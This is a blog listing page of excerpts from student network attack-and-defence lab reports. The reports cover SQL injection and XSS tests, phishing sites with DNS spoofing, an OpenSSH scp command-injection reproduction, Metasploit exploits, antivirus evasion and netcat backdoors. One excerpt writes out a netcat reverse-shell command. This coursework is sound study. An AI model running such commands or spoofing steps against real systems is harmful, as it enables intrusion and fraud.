- 博客(14)
- 收藏
- 关注
RSS订阅原创 网络对抗技术 20181314 Exp8 Web基础
一、原理与实践说明1.实践内容概述2.基础问题回答二、实践过程记录任务一:Web前端:HTML任务二:Web前端:javascipt任务三:Web后端:MySQL基础任务四:Web后端:编写PHP网页任务五:最简单的SQL注入,XSS攻击测试三、实验总结与体会一、原理与实践说明1.实践内容概述(1)Web前端HTML(0.5分)能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。(2)Web前端javascipt(0
2021-05-28 16:57:18
315
1
原创 网络对抗技术 20181314 Exp7 网络欺诈防范
一、原理与实践说明1.实践目标2.实践内容概述3.基础问题回答二、实践过程记录任务一:简单应用SET工具建立冒名网站任务二:ettercap DNS spoof任务三:结合应用两种技术,用DNS spoof引导特定访问到冒名网站三、实验遇到的问题及解决方法四、实验总结与体会一、原理与实践说明1.实践目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。2.实践内容概述简单应用SET工具建立冒名网站ettercap DNS spoof结合应用两种技术,用
2021-05-10 10:03:04
426
原创 CVE-2020-15778漏洞复现 OpenSSH命令注入
目录CVE-2020-15778漏洞复现学习 漏洞信息 1. scp命令 2. 模拟环境搭建 1. 查看ssh版本(CentOS) 2.正常情况下ssh和scp命令执行情况(Kali) 3.使用iptables策略搭建环境,禁用ssh登录,只保留scp(CentOS) 4. 测试ssh与scp在已设置iptables策略下的使用情况 3. scp命
2021-04-28 20:35:40
531
原创 网络对抗技术 20181314 Exp6 MSF基础应用
一、原理与实践说明1.实践原理2.实践内容概述3.基础问题回答二、攻击过程记录任务一:主动攻击的实践ms08_067_netapi:自动化漏洞溢出攻击任务二:攻击浏览器的实践ms07-017ms11-050任务三:攻击客户端的实践Adobems10_046任务四:成功应用任何一个辅助模块在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口加分项:测试2019年以后的漏洞三、实验遇到的问题及解决方法四、离实战还缺些什么技
2021-04-26 09:42:57
478
原创 Crypto API,PKCS#11,GMT 0016-2012,GMT 0018-2012简略使用指南
Crypto API,PKCS#11,GMT 0016-2012,GMT 0018-2012简略使用指南CryptoAPICryptoAPI是Win32平台下实现密码运算的一整套接口(当然你在Windows64也可以用),在Windows下做密码运算基本绕不过它。今天开始,就介绍一下如何调用CryptoAPI实现几个主要的密码运算功能。一、摘要(1)可以按照如下顺序调用接口实现摘要: BOOL CryptAcquireContext ( HCRYPTPROV * phProv,
2021-04-25 10:14:30
529
原创 网络对抗技术-Exp5-信息搜集与漏洞扫描 20181314
一、原理与实践说明1.实践原理2.实践内容概述3.基础问题回答二、实践过程记录任务一:各种搜索技巧的应用任务二:DNS IP注册信息的查询任务三:基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点主机发现端口扫描版本探测具体服务的查点漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞三、实验遇到的问题及解决方法四、实验总结与体会一、原理与实践说明1.实践目标信息搜集:渗透测试中首先要做的重要事项之一,搜集关于目标机器的一切信息
2021-04-12 16:42:02
740
原创 网络对抗技术-Exp4-恶意代码分析 20181314
一、原理与实践说明1.实践目标2.实践内容概述3.基础问题回答二、实践过程记录任务一:使用schtasks指令监控系统任务二:使用sysmon工具监控系统任务三:恶意软件分析使用VirusTotal分析恶意软件使用PEiD分析恶意软件使用PE Explorer分析恶意软件使用Process Monitor分析恶意软件使用Process Explorer分析恶意软件使用systracer分析恶意软件使用Wireshark分析恶意软件三、实验遇到的问题及解决方法四、实验总结与体会
2021-04-07 21:44:56
580
2
原创 网络对抗技术-Exp3-免杀原理 20181314
一、免杀原理及基础问题回答1.免杀原理一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。2.基础问题回答杀软是如何检测出恶意代码的?基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
2021-03-31 13:04:05
793
原创 商用密码企业调研(必做) 20181314
商用密码企业调研(必做)任务详情你家在哪个省(市,自治区,直辖市)?省内有什么商用密码企业?他们都有什么密码产品?竞争力如何?另外,再找几家(总共不少于十家,包含1中的企业)进行分析,他们都有什么密码产品?竞争力如何?1.安徽省合肥市。安徽省电子认证管理中心有限责任公司。手机盾手机盾统一认证系统就是用手机来实现传统U盾功能,采用CA密码技术实现,为银行、第三方支付、电子商务、移动办公、电子政务等提供安全身份认证和交易确认服务。手机盾统一认证系统通过银行卡检测中心检测、通过国家密码管理局认证
2021-03-17 19:55:13
8201
原创 网络对抗技术-Exp2-后门原理与实践 20181314
一、实验内容1.使用netcat获取主机操作Shell,cron启动Windows获得Linux Shell在Windows下使用ipconfig查看本机IPwin+r 输入cmd,打开监听 nc -l -p 1314在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序Windows成功获得kali的shell,利用ls,whoami指令查看相关信息Linux获得Windows Shell在kali中使用ifconfi
2021-03-15 10:28:46
478
原创 网络对抗技术-Exp1-PC平台逆向破解 20181314
网络对抗技术-Exp1-PC平台逆向破解一、实验准备1.首先在云班课上下载pwn1文件。2.将pwn1文件拷贝至共享文件夹,在kali中备份一份命名为pwn20181314 cp pwn1 pwn20181314。二、实验内容掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码汇编指令机器码NOP90JNE75JE74JMPebCMP39掌握反汇编与十六进制编程器能正确修改机器指令改变程序执行流程能正确构造payl
2021-03-08 11:03:52
220
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人